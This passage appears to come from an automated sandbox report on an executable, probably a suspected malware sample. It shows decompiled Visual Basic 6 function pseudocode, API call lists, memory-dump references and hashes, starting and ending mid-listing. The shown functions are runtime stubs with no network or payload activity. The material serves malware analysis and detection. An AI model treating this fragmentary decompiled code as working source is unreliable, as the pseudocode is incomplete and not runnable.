                                  0x0040ff52
                                  0x0040ff5c
                                  0x0040ff5d
                                  0x0040ff60
                                  0x0040ff61
                                  0x0040ff66
                                  0x0040ff6d
                                  0x0040ff72
                                  0x0040ff78
                                  0x0040ff7a
                                  0x0040ff80
                                  0x0040ff86
                                  0x0040ff8a
                                  0x004014fc
                                  0x004014fc
                                  0x0040ff8c
                                  0x0040ff8f
                                  0x0040ff93
                                  0x0040ff99
                                  0x0040ff9e
                                  0x0040ffa4
                                  0x0040ffa6
                                  0x0040ffad
                                  0x0040ffc9
                                  0x0040ffaf
                                  0x0040ffaf
                                  0x0040ffb4
                                  0x0040ffb9
                                  0x0040ffbc
                                  0x0040ffbf
                                  0x0040ffc4
                                  0x0040ffc4
                                  0x0040ffad
                                  0x0040ffcd
                                  0x0040ffce
                                  0x0040ffeb
                                  0x0040fff0

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FF23
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 0040FF3B
                                  • #526.MSVBVM60(?,00000001,?,?,?,?,004014F6), ref: 0040FF46
                                  • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FF61
                                  • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FF6D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,00000084,?,00008008,?,?,?,?,?,?,?,?,?,?), ref: 0040FFBF
                                  • __vbaFreeStr.MSVBVM60(0040FFF1,00008008,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040FFEB
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#526CheckChkstkCopyHresult
                                  • String ID:
                                  • API String ID: 3968931124-0
                                  • Opcode ID: 0007759b5149489e3c5504a04f1bf33bd396392d7184e90330968542a7a734c2
                                  • Instruction ID: c3315338085192747822dc13489a4555f63f7f921349edb29e00f9681229f222
                                  • Opcode Fuzzy Hash: 0007759b5149489e3c5504a04f1bf33bd396392d7184e90330968542a7a734c2
                                  • Instruction Fuzzy Hash: 4F214870900209ABCB10DF90CA49BEEBBB8BF04744F14457BF141B61E0DB79AA49CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410553, Relevance: 10.5, APIs: 7, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00410553(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				char _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				short _v64;
				char* _t20;
				short _t21;
				intOrPtr _t37;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t37;
				_push(0x30);
				L004014F0();
				_v12 = _t37;
				_v8 = 0x401310;
				L004016A6();
				_v52 = _a4;
				_v60 = 9;
				L00401634();
				_t20 =  &_v44;
				_push(_t20);
				L0040163A();
				_v64 =  ~(0 | _t20 != 0x0000ffff);
				L0040167C();
				_t21 = _v64;
				if(_t21 != 0) {
					_push(0x83);
					L0040162E();
				}
				_push(0x4105ee);
				L0040169A();
				return _t21;
			}













                                  0x00410558
                                  0x00410563
                                  0x00410564
                                  0x0041056b
                                  0x0041056e
                                  0x00410576
                                  0x00410579
                                  0x00410586
                                  0x0041058e
                                  0x00410591
                                  0x0041059e
                                  0x004105a3
                                  0x004105a6
                                  0x004105a7
                                  0x004105b7
                                  0x004105be
                                  0x004105c3
                                  0x004105c9
                                  0x004105cb
                                  0x004105d0
                                  0x004105d0
                                  0x004105d5
                                  0x004105e8
                                  0x004105ed

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041056E
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410586
                                  • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041059E
                                  • #562.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004105A7
                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004105BE
                                  • #570.MSVBVM60(00000083,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004105D0
                                  • __vbaFreeStr.MSVBVM60(004105EE,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004105E8
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#562#570ChkstkCopy
                                  • String ID:
                                  • API String ID: 1684261552-0
                                  • Opcode ID: 242df9575e5f207787040b6666d34da9dc73e1bf434215b243dd2ad5de6bb49c
                                  • Instruction ID: 0dbb57ec7d964b6d5a37acd094fd2ca649a01b138ff0bdcd9ce7cc473eec1f73
                                  • Opcode Fuzzy Hash: 242df9575e5f207787040b6666d34da9dc73e1bf434215b243dd2ad5de6bb49c
                                  • Instruction Fuzzy Hash: B7014070910209ABDB04EB95C842FEEBB78EF04B58F44442EF401B71E1EB7965858B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411FCB, Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00411FCB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				char _v48;
				signed int _v52;
				signed int _v64;
				signed int _t31;
				char* _t32;
				signed int _t34;
				void* _t38;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t38 = __edx;
				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L004014F0();
				_v16 = _t44;
				_v12 = 0x401488;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x28,  *[fs:0x0], 0x4014f6, _t41);
				_t31 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
				asm("fclex");
				_v52 = _t31;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x40256c);
					_push(_a4);
					_push(_v52);
					L004016B2();
					_v64 = _t31;
				}
				_push(0);
				_push(5);
				_push(_v32);
				_t32 =  &_v48;
				_push(_t32);
				L0040166A();
				_push(_t32);
				L004015D4();
				asm("cdq");
				_t34 = _t32 - _t38 >> 1;
				_v28 = _t34;
				L004016AC();
				L0040167C();
				_push(0x412090);
				return _t34;
			}


















                                  0x00411fcb
                                  0x00411fce
                                  0x00411fdd
                                  0x00411fe7
                                  0x00411fef
                                  0x00411ff2
                                  0x00411ff9
                                  0x00412008
                                  0x00412017
                                  0x0041201d
                                  0x0041201f
                                  0x00412026
                                  0x00412042
                                  0x00412028
                                  0x00412028
                                  0x0041202d
                                  0x00412032
                                  0x00412035
                                  0x00412038
                                  0x0041203d
                                  0x0041203d
                                  0x00412046
                                  0x00412048
                                  0x0041204a
                                  0x0041204d
                                  0x00412050
                                  0x00412051
                                  0x00412059
                                  0x0041205a
                                  0x0041205f
                                  0x00412062
                                  0x00412064
                                  0x0041206a
                                  0x00412072
                                  0x00412077
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411FE7
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401488,0040256C,00000160), ref: 00412038
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00412051
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041205A
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 0041206A
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 00412072
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkHresultLate
                                  • String ID:
                                  • API String ID: 499844174-0
                                  • Opcode ID: 1f2bfdfae3869dcc6bff9b88d2c1886ab037e4ede5e57c8a7c264720b039340d
                                  • Instruction ID: f15575f3bf4528d1e8b99e51d27d626412e5260ee852e878b6b90303c833909e
                                  • Opcode Fuzzy Hash: 1f2bfdfae3869dcc6bff9b88d2c1886ab037e4ede5e57c8a7c264720b039340d
                                  • Instruction Fuzzy Hash: 16113A75D00209BFCB00AFA5CC49FDEBBB8BB08704F50852AF505B71A1D7B9A5558B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411E95, Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00411E95(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				char _v48;
				signed int _v52;
				signed int _v64;
				signed int _t31;
				char* _t32;
				signed int _t34;
				void* _t38;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t38 = __edx;
				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L004014F0();
				_v16 = _t44;
				_v12 = 0x401470;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x28,  *[fs:0x0], 0x4014f6, _t41);
				_t31 =  *((intOrPtr*)( *_a4 + 0x190))(_a4,  &_v32);
				asm("fclex");
				_v52 = _t31;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x40256c);
					_push(_a4);
					_push(_v52);
					L004016B2();
					_v64 = _t31;
				}
				_push(0);
				_push(5);
				_push(_v32);
				_t32 =  &_v48;
				_push(_t32);
				L0040166A();
				_push(_t32);
				L004015D4();
				asm("cdq");
				_t34 = _t32 - _t38 >> 1;
				_v28 = _t34;
				L004016AC();
				L0040167C();
				_push(0x411f5a);
				return _t34;
			}


















                                  0x00411e95
                                  0x00411e98
                                  0x00411ea7
                                  0x00411eb1
                                  0x00411eb9
                                  0x00411ebc
                                  0x00411ec3
                                  0x00411ed2
                                  0x00411ee1
                                  0x00411ee7
                                  0x00411ee9
                                  0x00411ef0
                                  0x00411f0c
                                  0x00411ef2
                                  0x00411ef2
                                  0x00411ef7
                                  0x00411efc
                                  0x00411eff
                                  0x00411f02
                                  0x00411f07
                                  0x00411f07
                                  0x00411f10
                                  0x00411f12
                                  0x00411f14
                                  0x00411f17
                                  0x00411f1a
                                  0x00411f1b
                                  0x00411f23
                                  0x00411f24
                                  0x00411f29
                                  0x00411f2c
                                  0x00411f2e
                                  0x00411f34
                                  0x00411f3c
                                  0x00411f41
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411EB1
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401470,0040256C,00000190), ref: 00411F02
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00411F1B
                                  • __vbaI4Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411F24
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411F34
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 00411F3C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkHresultLate
                                  • String ID:
                                  • API String ID: 499844174-0
                                  • Opcode ID: 3f6116f1610f3c51ef72d0ceb34508593e264846a00c8f1f62d5a977258114b0
                                  • Instruction ID: 5f0791c18dfb59b72678206445a6d5ecbc87589d38b0bc0fb2f1edd71efa1ee7
                                  • Opcode Fuzzy Hash: 3f6116f1610f3c51ef72d0ceb34508593e264846a00c8f1f62d5a977258114b0
                                  • Instruction Fuzzy Hash: B6110A75D00209BFCB00AFA5CC49FDEBBB8BB04744F10842AF505B71B1D779A5459B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410009, Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00410009(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v36;
				char _v52;
				signed int _v56;
				signed int _v68;
				signed int _t31;
				char* _t32;
				intOrPtr _t33;
				void* _t39;
				void* _t41;
				intOrPtr _t42;

				_t42 = _t41 - 0xc;
				 *[fs:0x0] = _t42;
				L004014F0();
				_v16 = _t42;
				_v12 = 0x4012b0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4014f6, _t39);
				_t31 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v36);
				asm("fclex");
				_v56 = _t31;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x40256c);
					_push(_a4);
					_push(_v56);
					L004016B2();
					_v68 = _t31;
				}
				_push(0);
				_push(3);
				_push(_v36);
				_t32 =  &_v52;
				_push(_t32);
				L0040166A();
				_push(_t32);
				L00401670();
				_t33 = _t32;
				_v28 = _t33;
				L004016AC();
				L0040167C();
				_push(0x4100cc);
				return _t33;
			}

















                                  0x0041000c
                                  0x0041001b
                                  0x00410025
                                  0x0041002d
                                  0x00410030
                                  0x00410037
                                  0x00410046
                                  0x00410055
                                  0x0041005b
                                  0x0041005d
                                  0x00410064
                                  0x00410080
                                  0x00410066
                                  0x00410066
                                  0x0041006b
                                  0x00410070
                                  0x00410073
                                  0x00410076
                                  0x0041007b
                                  0x0041007b
                                  0x00410084
                                  0x00410086
                                  0x00410088
                                  0x0041008b
                                  0x0041008e
                                  0x0041008f
                                  0x00410097
                                  0x00410098
                                  0x0041009d
                                  0x004100a0
                                  0x004100a6
                                  0x004100ae
                                  0x004100b3
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410025
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004012B0,0040256C,00000160), ref: 00410076
                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000003,00000000), ref: 0041008F
                                  • __vbaI2Var.MSVBVM60(00000000,?,?,?,004014F6), ref: 00410098
                                  • __vbaFreeObj.MSVBVM60(00000000,?,?,?,004014F6), ref: 004100A6
                                  • __vbaFreeVar.MSVBVM60(00000000,?,?,?,004014F6), ref: 004100AE
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CallCheckChkstkHresultLate
                                  • String ID:
                                  • API String ID: 499844174-0
                                  • Opcode ID: 951a9666f08f445272fd3e393751f136bcc5aec031a93e29da2bdf378a50e636
                                  • Instruction ID: c254982259d69f7462b13b132f55d615551a6c76b134d1358c3065859082662d
                                  • Opcode Fuzzy Hash: 951a9666f08f445272fd3e393751f136bcc5aec031a93e29da2bdf378a50e636
                                  • Instruction Fuzzy Hash: 12112970900208FFCB01EFA4DD49FDEBBB4BB08744F10446AF504B71A1C7796A408B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041260E, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0041260E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				short _v60;
				char* _t24;
				short _t25;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t38 = _t37 - 0xc;
				 *[fs:0x0] = _t38;
				L004014F0();
				_v16 = _t38;
				_v12 = 0x4014c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x2c,  *[fs:0x0], 0x4014f6, _t35);
				_v48 = _a4;
				_v56 = 9;
				L00401634();
				_t24 =  &_v40;
				_push(_t24);
				L0040163A();
				_v60 =  ~(0 | _t24 != 0x0000ffff);
				L0040167C();
				_t25 = _v60;
				if(_t25 != 0) {
					_push(0xf);
					L0040162E();
				}
				_push(0x4126a6);
				return _t25;
			}















                                  0x00412611
                                  0x00412620
                                  0x0041262a
                                  0x00412632
                                  0x00412635
                                  0x0041263c
                                  0x0041264b
                                  0x00412651
                                  0x00412654
                                  0x00412661
                                  0x00412666
                                  0x00412669
                                  0x0041266a
                                  0x0041267a
                                  0x00412681
                                  0x00412686
                                  0x0041268c
                                  0x0041268e
                                  0x00412690
                                  0x00412690
                                  0x00412695
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$#562#570ChkstkFree
                                  • String ID:
                                  • API String ID: 3756826682-0
                                  • Opcode ID: db2bd20929c4f19f1c9df250453b394c783ae76a0afa4fa8f2fb1264177e81b0
                                  • Instruction ID: efd10964f0caf3966477dfa96b0f502f9446770f0845841ef34bdf2f4da6767d
                                  • Opcode Fuzzy Hash: db2bd20929c4f19f1c9df250453b394c783ae76a0afa4fa8f2fb1264177e81b0
                                  • Instruction Fuzzy Hash: 36018074900209ABCB00EFA5C945BDDBBB4EF08B04F10442AF404F72E1D7799A449B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FE86, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0040FE86(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t26;
				intOrPtr _t28;

				 *[fs:0x0] = _t28;
				L004014F0();
				_v16 = _t28;
				_v12 = 0x401288;
				_v8 = 0;
				_t16 =  *((intOrPtr*)( *_a4 + 4))(_a4, _t24, _t26, _t21, 0x18,  *[fs:0x0], 0x4014f6);
				_push(0x402b94);
				_push(0x402b94);
				L00401694();
				if(_t16 != 0) {
					_push(L"smartish");
					_push(0x36);
					_push(0xffffffff);
					_push(0x20);
					L0040168E();
				}
				 *((intOrPtr*)( *_a4 + 8))(_a4);
				 *[fs:0x0] = _v24;
				return _v8;
			}












                                  0x0040fe98
                                  0x0040fea2
                                  0x0040feaa
                                  0x0040fead
                                  0x0040feb4
                                  0x0040fec3
                                  0x0040fec6
                                  0x0040fecb
                                  0x0040fed0
                                  0x0040fed7
                                  0x0040fed9
                                  0x0040fede
                                  0x0040fee0
                                  0x0040fee2
                                  0x0040fee4
                                  0x0040fee4
                                  0x0040fef1
                                  0x0040fefa
                                  0x0040ff05

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0040FEA2
                                  • __vbaStrCmp.MSVBVM60(00402B94,00402B94,?,?,?,?,004014F6), ref: 0040FED0
                                  • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000036,smartish,00402B94,00402B94,?,?,?,?,004014F6), ref: 0040FEE4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$ChkstkFileOpen
                                  • String ID: smartish
                                  • API String ID: 3263042092-151392084
                                  • Opcode ID: fb0321547c9b038074b566e64522b805f74e6f2171da6acf84a95f16fe66fc4d
                                  • Instruction ID: ba110b99dac98565da577c8f5fce1bca0ccc915edcb2a2841c90ea61e29d4221
                                  • Opcode Fuzzy Hash: fb0321547c9b038074b566e64522b805f74e6f2171da6acf84a95f16fe66fc4d
                                  • Instruction Fuzzy Hash: A6012C75640304BFDB10DF99C94AF4EBBB4EB44B54F10817AF804BB2E2C7B9A9008B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004100F3, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E004100F3(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;

				_t37 = _t36 - 0xc;
				 *[fs:0x0] = _t37;
				L004014F0();
				_v16 = _t37;
				_v12 = 0x4012c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4014f6, _t34);
				L004016A6();
				asm("fld1");
				 *_t37 = __fp0;
				_t27 =  *((intOrPtr*)( *_a4 + 0x10c))(_a4,  &_v36);
				asm("fclex");
				_v40 = _t27;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x10c);
					_push(0x40256c);
					_push(_a4);
					_push(_v40);
					L004016B2();
					_v52 = _t27;
				}
				asm("wait");
				_push(0x41018a);
				L0040169A();
				return _t27;
			}













                                  0x004100f6
                                  0x00410105
                                  0x0041010f
                                  0x00410117
                                  0x0041011a
                                  0x00410121
                                  0x00410130
                                  0x00410139
                                  0x0041013e
                                  0x00410141
                                  0x0041014c
                                  0x00410152
                                  0x00410154
                                  0x0041015b
                                  0x00410177
                                  0x0041015d
                                  0x0041015d
                                  0x00410162
                                  0x00410167
                                  0x0041016a
                                  0x0041016d
                                  0x00410172
                                  0x00410172
                                  0x0041017b
                                  0x0041017c
                                  0x00410184
                                  0x00410189

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041010F
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410139
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004012C0,0040256C,0000010C), ref: 0041016D
                                  • __vbaFreeStr.MSVBVM60(0041018A), ref: 00410184
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkCopyFreeHresult
                                  • String ID:
                                  • API String ID: 3646427762-0
                                  • Opcode ID: 014a9c5e52b5f08396c34800daf7d799b0ab647ef69d6c1cb7261a6f6db104ad
                                  • Instruction ID: 50e44efec21156d216ae8faefcf74566c96c85022cf6104accd6749212589176
                                  • Opcode Fuzzy Hash: 014a9c5e52b5f08396c34800daf7d799b0ab647ef69d6c1cb7261a6f6db104ad
                                  • Instruction Fuzzy Hash: 42111835940208FFCB00EF94C949FDDBBB4BB08744F10856AF441B72A1C7B95A809B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004114A6, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E004114A6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				void* _t34;
				void* _t36;
				intOrPtr _t37;

				_t37 = _t36 - 0xc;
				 *[fs:0x0] = _t37;
				L004014F0();
				_v16 = _t37;
				_v12 = 0x4013c8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4014f6, _t34);
				L004016A6();
				_t27 =  *((intOrPtr*)( *_a4 + 0x284))(_a4, 1);
				asm("fclex");
				_v40 = _t27;
				if(_v40 >= 0) {
					_v52 = _v52 & 0x00000000;
				} else {
					_push(0x284);
					_push(0x40256c);
					_push(_a4);
					_push(_v40);
					L004016B2();
					_v52 = _t27;
				}
				asm("wait");
				_push(0x411539);
				L0040169A();
				return _t27;
			}













                                  0x004114a9
                                  0x004114b8
                                  0x004114c2
                                  0x004114ca
                                  0x004114cd
                                  0x004114d4
                                  0x004114e3
                                  0x004114ec
                                  0x004114fb
                                  0x00411501
                                  0x00411503
                                  0x0041150a
                                  0x00411526
                                  0x0041150c
                                  0x0041150c
                                  0x00411511
                                  0x00411516
                                  0x00411519
                                  0x0041151c
                                  0x00411521
                                  0x00411521
                                  0x0041152a
                                  0x0041152b
                                  0x00411533
                                  0x00411538

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004114C2
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004114EC
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004013C8,0040256C,00000284), ref: 0041151C
                                  • __vbaFreeStr.MSVBVM60(00411539), ref: 00411533
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$CheckChkstkCopyFreeHresult
                                  • String ID:
                                  • API String ID: 3646427762-0
                                  • Opcode ID: 292729f6fdf41c367f9f87b2d632195340b17d3da4aa1af189d079573ba5fc4c
                                  • Instruction ID: 89ac7b59735f594d0f4df46b32c3bab8ae871c3242faa712dd65952c3f2bf80e
                                  • Opcode Fuzzy Hash: 292729f6fdf41c367f9f87b2d632195340b17d3da4aa1af189d079573ba5fc4c
                                  • Instruction Fuzzy Hash: 3711E575940209BFCB00EF95C949FCDBBB5BB08744F10846AF801AB2A1D779AA449B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411560, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00411560(intOrPtr* _a4, long long* _a36) {
				long long _v12;
				signed int _v16;
				signed int _v20;
				signed int _t16;

				L004014F0();
				_t16 =  *((intOrPtr*)( *_a4 + 0x16c))(_a4, L"HENKASTENDE", 0x10);
				asm("fclex");
				_v16 = _t16;
				if(_v16 >= 0) {
					_v20 = _v20 & 0x00000000;
				} else {
					_push(0x16c);
					_push(0x40256c);
					_push(_a4);
					_push(_v16);
					L004016B2();
					_v20 = _t16;
				}
				 *_a36 = _v12;
				return 0;
			}







                                  0x00411566
                                  0x00411578
                                  0x0041157e
                                  0x00411580
                                  0x00411587
                                  0x004115a3
                                  0x00411589
                                  0x00411589
                                  0x0041158e
                                  0x00411593
                                  0x00411596
                                  0x00411599
                                  0x0041159e
                                  0x0041159e
                                  0x004115ad
                                  0x004115b2

                                  APIs
                                  • __vbaChkstk.MSVBVM60 ref: 00411566
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040256C,0000016C), ref: 00411599
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.306336879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.306331990.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.306362793.0000000000413000.00000004.00020000.sdmp Download File
